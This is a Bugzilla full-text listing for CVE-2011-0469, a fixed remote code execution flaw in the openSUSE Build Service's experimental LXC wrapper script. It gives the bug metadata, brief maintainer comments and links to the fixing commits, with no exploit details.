Bugzilla – Full Text Bug Listing

| Summary: | VUL-0: CVE-2011-0469: openSUSE Build Service: remote code execution | | |
|---|---|---|---|
| Product: | [openSUSE] openSUSE.org | Reporter: | Matthias Weckbecker <mweckbecker> |
| Component: | BuildService | Assignee: | Adrian Schröter <adrian.schroeter> |
| Status: | RESOLVED FIXED | QA Contact: | Adrian Schröter <adrian.schroeter> |
| Severity: | Major | | |
| Priority: | P2 - High | CC: | meissner, security-team |
| Version: | unspecified | | |
| Target Milestone: | --- | | |
| Hardware: | Other | | |
| OS: | Other | | |
| Whiteboard: | | | |
| Found By: | --- | Services Priority: | |
| Business Priority: | | Blocker: | --- |
| Marketing QA Status: | --- | IT Deployment: | --- |
Description
Matthias Weckbecker
2011-03-14 10:50:33 UTC
use CVE-2011-0469

The first script I found this issue in is fixed now (sr 64070). But the other services, especially with network connection, contain a higher risk.

This was only possible when using the "experimental lxc wrapper for additional security ;)". This is fixed now. I will include the fix in the next 2.1 release, but I have some serious doubts that anyone else ever used the LXC wrapper (because it is quite tricky to get it working anyway).

Comment 2: The problem was not the particular service; it was buggy, but safe. The problem was the lxc wrapper script (only used on the server side so far).

main fix is in: https://github.com/openSUSE/open-build-service/commit/76b0ab003f34435ca90d943e02dd22279cdeec2a

secondary fix in: https://github.com/openSUSE/open-build-service/commit/23c8d21c75242999e29379e6ca8418a14c8725c6

no official announcement on openbuildservice.org.